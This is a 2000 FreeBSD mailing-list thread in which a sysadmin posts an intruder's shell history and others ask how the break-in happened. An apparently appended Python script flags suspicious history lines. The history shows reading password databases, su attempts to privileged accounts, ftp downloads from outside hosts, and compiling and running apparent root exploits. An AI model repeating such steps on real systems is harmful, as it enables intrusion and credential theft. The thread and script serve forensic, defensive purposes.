Date: Mon, 18 Dec 2000 15:56:27 -0500 (EST)
From: Joe Oliveiro <joe@advancewebhosting.com>
To: Alexander V P <alex@big-blue.net>
Cc: "Gerald T. Freymann" <freymann@eagle.ca>, Questions <questions@FreeBSD.ORG>
Subject: Re: Hacker history file - OUCH
Message-ID: <Pine.BSF.4.21.0012181556100.6889-100000@joe.pythonvideo.com>
In-Reply-To: <Pine.BSF.4.05.10012181523480.23598-100000@borg.starbase.net>
i like wiping the box!

Microsoft: "Where would you like to go to today"
Linux: "Where would you like to go tomorrow"
FreeBSD: "Hey, when are you guys going to catch up"

On Mon, 18 Dec 2000, Alexander V P wrote:

> hi,
> do you keep/have logs about what ftp transfers he did?
> did you send mail to root@he.net, or .mx domain?
> any idea how he broke in? what freebsd you're using?
> if I were in your place, I'd unplug the box and try to find out more about
> this. don't do like most of the sysadmins that just wipe the box.
> alex
>
> On Mon, 18 Dec 2000, Gerald T. Freymann wrote:
>
> > Seems we have an intruder on one of our boxes... the .history file from the
> > troubled account follows:
> >
> > cd bnc
> > ls
> > ./bash
> > who
> > cd /etc
> > more passwd
> > ps -l
> > ls -l
> > more pwd.db
> > more hosts
> > pico adduser.conf.bak
> > pico group
> > su user
> > pico group.bak
> > pico ftpuser
> > O
> > pico ftpusers
> > su toor
> > su operator
> > id
> > pico spwd.db
> > su wheel
> > pico passwd
> > cd /var/tmp
> > ls -a
> > cd ...
> > ls -a
> > cd ..
> > ls -l
> > ls -al
> > cd ...
> > ftp copper.he.net
> > chmod u+x xcon
> > ./xcon
> > id
> > rm *
> > ls
> > who
> > cd /var/tmp
> > ls -a
> > ls -al
> > cd ...
> > ls -a
> > ftp cih.edu.mx
> > ls
> > cc bsd1 bsd-cron.c
> > cc -o bsd1 bsd-cron.c
> > ./bsd1
> > id
> > cc -o bsd2 bsd2.c
> > ./bsd2
> > id
> > ls
> > ftp cih.edu.mx
> > ./bsd sh
> > ./bsd.sh
> > chmod u+x bsd.sh
> > ./bsd.sh
> > /tmp/sh
> > id
> > ls
> > cc -o bsdsmail bsdsmail.c
> > ./bsdsmail
> > ls -a
> > pico hack
> > ls
> > pico user.inf
> > ls
> > id
> > rm *
> > exit
> >
> > Anybody recognize what the intruder has set up?
> >
> > -Gerry

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-questions" in the body of the message
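As an added illustration that is not part of the thread, the script below triages a shell history of the kind Gerry posted: it tags the behaviours visible there (su hops between privileged accounts, reads of password files, `...` hiding directories, outbound ftp, compiling and running binaries, `rm *` cleanup) and totals them so a sysadmin can see at a glance what to investigate before deciding whether to wipe. The sample history and the tag names are constructed for the example and mirror the quoted listing rather than reproduce it.

```python
import re
from collections import Counter

# Constructed sample shaped like the quoted .history (not the real file).
SAMPLE_HISTORY = """\
more pwd.db
su toor
su wheel
cd /var/tmp
cd ...
ftp copper.he.net
cc -o bsd1 bsd-cron.c
./bsd1
rm *
"""
PRIVILEGED = {"root", "toor", "operator", "wheel"}
SENSITIVE = ("passwd", "pwd.db", "spwd.db", "group", "ftpusers")
VIEWERS = {"more", "cat", "less", "pico", "vi"}

def classify(line):
    """Return the indicator tags that apply to one history line."""
    words = line.split()
    if not words:
        return []
    cmd, args = words[0], words[1:]
    tags = []
    if cmd == "su" and args and args[0] in PRIVILEGED:
        tags.append("privileged-su")         # hopping between privileged accounts
    if cmd in VIEWERS and any(a.endswith(SENSITIVE) for a in args):
        tags.append("credential-file-access")
    if cmd == "cd" and args and re.fullmatch(r"\.{3,}", args[0]):
        tags.append("hidden-dir")            # "..." directories hide dropped files
    if cmd == "ftp" and args:
        tags.append("outbound-ftp")          # tool download or exfil channel
    if cmd in ("cc", "gcc"):
        tags.append("local-compile")         # something being built on the box
    if cmd.startswith("./"):
        tags.append("exec-local-binary")
    if cmd == "rm" and "*" in args:
        tags.append("bulk-delete")           # cleanup of dropped tools
    return tags

def analyze(history):
    """Return {line_no: (line, tags)} for flagged lines plus a Counter of tags."""
    flagged, totals = {}, Counter()
    for n, line in enumerate(history.splitlines(), 1):
        tags = classify(line)
        if tags:
            flagged[n] = (line, tags)
            totals.update(tags)
    return flagged, totals
```

Run `analyze(SAMPLE_HISTORY)` (or feed it a real `.history` read from a copy of the disk) and the per-line tags show where tools were fetched, built and removed, which is also where to look in ftp logs and in `/var/tmp` before anything is wiped.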